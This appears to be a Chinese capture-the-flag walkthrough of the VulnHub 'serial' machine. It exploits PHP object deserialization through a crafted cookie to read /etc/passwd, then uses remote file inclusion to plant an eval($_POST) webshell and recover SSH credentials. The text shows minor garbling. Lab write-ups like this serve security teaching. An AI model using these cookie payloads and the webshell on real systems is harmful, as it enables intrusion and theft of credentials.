怎样推广网站平台,wordpress专题,网站正常打开速度,wordpress 自动内链环境搭建
下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种 你会得到一个这样的文件#xff0c;这里使用VMware新建一个虚拟机#xff0c;这里记录比较重要的几部分。 这里就是使用我们刚才下过来的。 漏洞过程详解
1.信息收集
打开靶机#xff0…环境搭建
下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种 你会得到一个这样的文件这里使用VMware新建一个虚拟机这里记录比较重要的几部分。 这里就是使用我们刚才下过来的。 漏洞过程详解
1.信息收集
打开靶机在kali虚拟机中进行主机存活探测
arp-scan -l 分析一下可知靶机IP地址位192.168.3.131 2.端口扫描
nmap -p- 192.168.3.131 --min-rate10000以最小速率10000扫描 3.目录扫描 可以都访问一下 在backup目录下发现bak.zip文件下载下来
4.漏洞扫描
分析文件 index.php 发现三个文件有包含的关系放到同一文件中分析
?phpclass Log {private $type_log;function __costruct($hnd) {$this-$type_log $hnd;}public function handler($val) {include($this-type_log);echo LOG: . $val;}}class Welcome {public function handler($val) {echo Hello . $val;}}class User {private $name;private $wel;function __construct($name) {$this-name $name;$this-wel new Welcome();}function __destruct() {//echo bye\n;$this-wel-handler($this-name);}}if(!isset($_COOKIE[user])) {setcookie(user, base64_encode(serialize(new User(sk4))));} else {unserialize(base64_decode($_COOKIE[user]));}echo This is a beta test for new cookie handler\n;
?发现有三个类如果用户没有COOKIE就给用户生成一个名为sk4的COOKIE否则将用户的COOKIE反序列化 COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果 User类中有两个魔法方法分别为创建和销毁时调用 我们代理抓包进入repeater模块 尝试将COOKIE删除相应包中带来了COOKIE,用户名为sk4
将COOKIE撤销回去
5.尝试更改 COOKIE
选中COOKIE在burp的解码器中可以看出这里的cookie经过了URL编码将%3D改成 再次选中COOKIE将解码方式改为Base64可以看出结果为User类的序列化结果 进行Base64解码修改用户名及其长度 O:4:User:2:{s:10:Username;s:5:mzqms;s:9:Userwel;O:7:Welcome:0:{}}7 漏洞利用
漏洞存在思考利用
继续分析代码发现Wel实例销毁时调用了公共方法hadler而hadler方法不止在Welcome类中有在Log类中不仅存在hadler方法还存在文件包含所以替换COOKIE中的Welocome实例 由于目标系统为Linux所以文件包含passwd
这里可以直接用我下面的
O:4:User:2:{s:4:name;s:3:sk4;s:3:wel;O:3:Log:1:{s:8:type_log;s:11:/etc/passwd;}} 发现passwd文件显示了出来
尝试远程文件包含
开启Windows系统的服务器根目录下创建一个1.txt文件 更改COOKIE要改成自己的window的ip 将1.txt改为一句话木马
?php
eval($_POST[cmd]);
?打开蚁剑连接将Cookie放入Http头中 测试连接连接成功
浏览目录发现根目录下有credentials.txt.bak文件 应该是sk4用户的密码由于22端口开启尝试远程连接 ssh sk4192.168.3.131 登陆成功依旧浏览目录发现flag